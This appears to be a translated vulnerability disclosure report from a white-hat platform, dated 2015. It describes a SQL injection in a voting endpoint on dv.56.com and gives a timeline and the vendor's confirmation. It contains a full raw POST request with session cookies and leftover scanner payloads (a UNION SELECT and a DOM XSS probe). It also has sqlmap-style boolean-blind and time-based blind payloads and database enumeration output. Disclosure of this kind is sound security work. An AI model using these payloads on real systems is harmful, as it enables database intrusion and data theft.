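2015-09-23: Details reported to the vendor; awaiting the vendor's handling
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and experts in related fields
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to trainee white hats
2015-11-07: Details disclosed to the public

A routine SQL injection.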
POST /2012byz/index.php?action=Index&do=Vote HTTP/1.1
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dv.56.com/
Cookie: PHPSESSID=3nd5eknrfpk07dvocq3kdqek30; SERVERID=b1f8683e17785f3e401ea4f9fc0e8862|1442584785|1442584021; lang=zh-cn; theme=default; resourceurl=http%3A%2F%2Fg7s.resources.huoyunren.com%2F; ucenterurl=http%3A%2F%2Fg7s.ucenter.huoyunren.com; _TOKEN=7a6c5d373238f581141b96a14f35caf1; userTheme=smart-style-2; LOGIN_LOGO=http%3A%2F%2Fg7s-fs.oss-cn-hangzhou.aliyuncs.com%2Fattachment%2F2015-08-27%2F1887369BBA28A81E71C3A02219C4106F.png; uc=CCADD301C97EC35DDCA6E0C2444DDD3D; blackbird={pos:1,size:0,load:null}; Dbp_forward_url=http%3A%2F%2Fdemo.destoon.com%2Fv5.0%2Fmember%2Flogin.php%3Fforward%3Dhttp%253A%252F%252Fdemo.destoon.com%252Fv5.0%252Fmember%252Frecord.php%253Faction%253Dpay%2526mid%253D-1%252F%252A%252150000union%252A%252F%252F%252A%252150000select%252A%252Fuser%2528%2529%252C2%252Cdatabase%2528%2529%252Cversion%2528%2529%252C5%252C6%252C7%252C8%252C9--; AJSTAT_ok_pages=2; AJSTAT_ok_times=1; Dbp_guest_truename=?????|??|; Dbp_guest_areaid=394; [email protected]; Dbp_auth=AD81XxMgXGgPBjJRXGsbOmgZDjV8QDdqIkBpMnRLUTcrSTFTLElCdTQEJBNmVgxvdRZ9EG9UBWZRP3xIdE5ZPAAzNVUTJ1w-S-DzcyDVxrG3FoCQ4-S-fEc3USJMaQp-Z-c1EzK-Z-AxOCxy; Dbp_userid=8945; Dbp_username=dest22; broadcast_channel=www.acunetix-referrer.com; fuid=14429826465401978773; landingrefer=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); 56authcode=nggek31qfo6vuhc5n4nnf3c0i0; geoip=%b1%b1%be%a9%ca%d0%b1%b1%be%a9%ca%d0-114.247.50.2; pudm_AAAA=MLuxM453B1zDlFHAtWs6Q2mzX02rW+sFaUdfZRS0OxMQ2qUuT0gVR3Te7/KLoBn9v6v9j+Wp2FghVeprXEpNiPHvzT+4pv7k84oArWnzLXI9j0ieH1dnznNaDA==; uid=2002997071; dianboRand=1602; ick=de7a6a1b-a24f-4ed3-9681-297994886055
Host: dv.56.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

vid=1
---
Parameter: vid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: vid=-2627" OR 6159=6159 AND "KRCv"="KRCv
    Vector: OR [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: vid=1" AND (SELECT * FROM (SELECT(SLEEP(5)))Wbjw) AND "OiiS"="OiiS
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
back-end DBMS: MySQL 5.0.12
available databases [171]:
~fix
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-09-23 23:09
Deprecated code; thanks for the heads-up.
None yet